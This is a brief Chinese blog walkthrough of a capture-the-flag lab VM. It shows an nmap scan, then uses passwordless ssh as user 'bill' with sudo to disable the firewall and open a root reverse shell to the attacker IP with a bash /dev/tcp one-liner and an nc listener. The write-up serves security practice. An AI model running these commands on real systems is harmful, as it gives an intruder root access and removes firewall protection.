CTF實戰_012

原創

2019-06-28 02:44

靶機環境
鏈接：https://pan.baidu.com/s/1EcZidZbzbCDL6R8SiGG0Ng 提取碼：jne2
攻擊機IP 192.168.1.4
靶機IP 192.168.1.6

# nmap掃描結果
root@kali:~# nmap 192.168.1.6
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-26 21:18 EDT
Nmap scan report for 192.168.1.6
Host is up (0.031s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
8080/tcp open  http-proxy
MAC Address: 08:00:27:77:66:39 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds

ls -ahl /home

ls -ahl /home/bill

使用ssh 用戶名@localhost 登錄服務器是不需要驗證的
ssh bill@loaclhost sudo -l      #查看root權限命令
ssh bill@localhost sudo ufw disable    #關閉防火牆

nc -lvp 4444  #攻擊機開啓端口

ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.1.4/4444 0>&1  #反彈shell

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

CTF實戰_012

ls -ahl /home

ls -ahl /home/bill

杭州的 IT 崩盤了麼？

開源高性能結構化日誌模塊NanoLog

Python 潮流週刊#55：分享 9 個高質量的技術類信息源！

Azure Virtual Network (22) 多訂閱使用Azure DNS解析問題 Windows Azure Platform 系列文章目錄

【簡寫Mybatis-02】註冊機的實現以及SqlSession處理

手繪二維碼

.NET藉助虛擬網卡實現一個簡單異地組網工具

Office 2013-2019 C2R Install v6.3 使用

pycharm_linux_安裝

CTF實戰_017

CTF實戰_016

CTF實戰_015

Mac下配置sublime實現LaTeX

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結